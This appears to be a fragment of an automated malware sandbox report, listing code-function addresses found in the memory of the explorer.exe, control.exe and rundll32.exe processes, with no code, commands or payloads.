Source: C:\Windows\explorer.exe; Code function: 32_2_04DBEF7C
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB2F1C
Source: C:\Windows\explorer.exe; Code function: 32_2_04DA78F0
Source: C:\Windows\explorer.exe; Code function: 32_2_04DCE09C
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB386C
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB206C
Source: C:\Windows\explorer.exe; Code function: 32_2_04DBE808
Source: C:\Windows\explorer.exe; Code function: 32_2_04DCE038
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB11DC
Source: C:\Windows\explorer.exe; Code function: 32_2_04DA49BC
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC0294
Source: C:\Windows\explorer.exe; Code function: 32_2_04DCFA10
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC6A28
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC2BD8
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC53D4
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB3BF4
Source: C:\Windows\explorer.exe; Code function: 32_2_04DA2B40
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB0304
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB5890
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB6B80
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DAC458
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DA78F0
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DCE09C
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB2854
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB386C
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB206C
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DBE808
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DCE038
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB11DC
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DA49BC
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DA42CC
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DBAACC
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC0294
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DCFA10
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC6A28
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC2BD8
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC53D4
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DAEBD0
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB3BF4
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DA2B40
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB0304
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB44FC
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DADC88
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DA74A8
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC1C68
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DCD468
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC9C04
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB3438
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC7DDC
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DA559C
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC75B4
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC15A0
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC0D40
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DCED7C
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DA9514
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB1D14
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB7500
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DA1D20
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DBBE9C
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DCEFD0
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB97C8
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DA3F98
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB4F5C
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DBEF7C
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB2F1C
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4346B80
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4345890
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A43349BC
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A43411DC
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4356A28
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A435FA10
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4350294
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4340304
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A434AACC
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A43342CC
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4332B40
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4359C04
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4343BF4
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4352BD8
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A43553D4
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A433EBD0
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4343438
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4351C68
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A435D468
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A433C458
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A43374A8
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A433DC88
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A43444FC
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4347500
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4350D40
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4331D20
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4341D14
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4339514
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A435ED7C
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A43575B4
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A433559C
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A43515A0
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4357DDC